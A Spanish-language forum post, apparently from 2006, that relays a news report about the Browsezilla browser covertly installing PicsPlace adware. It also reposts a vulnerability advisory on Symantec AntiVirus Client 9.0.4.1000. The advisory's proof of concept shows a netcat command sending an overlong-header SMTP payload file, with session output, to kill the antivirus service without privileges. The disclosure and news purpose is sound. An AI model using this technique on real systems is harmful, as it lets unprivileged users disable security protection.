• Registrarse
  • Iniciar sesión


  • Resultados 1 al 1 de 1

    El navegador gratuito Browsezilla instala malware

    Solo a manera de informacion: Concretamente el malware que introduce es el conocido como PicsPlace y lo realiza de forma totalmente oculta para sus usuarios. El objetivo de este código es realizar visitas "ocultas" a ...

          
    1. #1
      Ex-Colaborador Avatar de Fulgore
      Registrado
      jun 2006
      Ubicación
      Colombia (Medellin)
      Mensajes
      1.400

      Atención El navegador gratuito Browsezilla instala malware

      Solo a manera de informacion:

      Concretamente el malware que introduce es el conocido como PicsPlace y lo realiza de forma totalmente oculta para sus usuarios. El objetivo de este código es realizar visitas "ocultas" a determinadas páginas de adultos para incrementar el tráfico de estas y obtener un beneficio por este aumento. El beneficio no solo es para estas páginas sino que se traduce también al propio navegador vía publicidad.

      Esté código se activa cada vez que se arranca del PC y periódicamente se conecta con las webs mencionadas sin conocimiento del usuario. Este hecho provoca una disminución del ancho de banda disponible de los usuarios y el riesgo de estar relacionado con determinadas IP legales o no, pero que en todo caso visitas no solicitadas.

      Este navegador es gratuito para los internautas y utiliza un logo de un dinosaurio. Sus autores han manifestado que se trata de un navegador que aumenta la seguridad con respecto a otros navegadores debido a que elimina el historial de páginas visitadas y el listado de favoritos. Lógicamente para evitar reconocer las visitas no deseadas que realiza.

      Fuente: DiarioTI


      Vulnerabilidad procesando SMTP en Symantec Antivirus Client




      [ spanish - español ]

      - 1 - Introduccion -

      Symantec AntiVirus Corporate Edition combina soluciones galardonadas y escalables de protección antivirus para la empresa con una consola de administración central para ofrecer la protección líder del mercado y una reducción del costo total de propiedad.


      - 2 - Descripcion -

      Cuando se intenta enviar un email desde la maquina que tiene el Symantec Antivirus Client, si en los campos TO, FROM y SUBJECT de las cabeceras se pone un texto excesivamente largo, provoca un error que mata el servicio "Symantec Antivirus". Esto puede realizarlo cualquier usuario, por lo que cualquier usuario sin privilegios podría detener el servicio antivirus sin tener permiso para hacerlo.

      Las pruebas se han realizado en diversas maquinas, todas con Windows XP SP2 en Ingles con Language Pack en Español, con el programa Symantec Antivirus Client 9.0.4.1000 (corporate edition)

      Si las pruebas se realizan bajo vmware el error se produce pero no mata el servicio..


      Sólo la demostracion de la prueba de concepto

      ---------
      C:\Testing>net start | find /i "antivirus"
      Symantec AntiVirus
      Symantec AntiVirus Definition Watcher

      C:\Testing>net stop "symantec antivirus"
      System error 5 has occurred.

      Access is denied.

      C:\Testing>nc -vv 192.168.1.42 25 < overflowAntivirus.txt
      DNS fwd/rev mismatch: CWTMYSERVER != KUROBUDETSU.HYPERZIMUR.COM
      CWTMYSERVER [192.168.1.42] 25 (smtp) open
      220 KUROBUDETSU.HYPERZIMUR.COM Microsoft ESMTP MAIL Service, Version: 6.0.3
      790.1830 ready at Thu, 27 Apr 2006 15:46:12 +0200
      250 KUROBUDETSU.HYPERZIMUR.COM Hello [192.168.1.42]
      250 2.1.0 [email protected]...Sender OK
      250 2.1.5 [email protected]
      354 Please start mail input.
      250 Mail queued for delivery.
      221 Closing connection. Good bye.
      sent 2986, rcvd 381: NOTSOCK
      Última edición por Fulgore fecha: 03/07/06 a las 18:44:56